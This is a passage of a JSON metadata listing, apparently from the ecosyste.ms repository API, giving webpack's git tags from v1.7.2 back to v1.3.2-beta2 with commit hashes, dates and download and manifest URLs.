dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.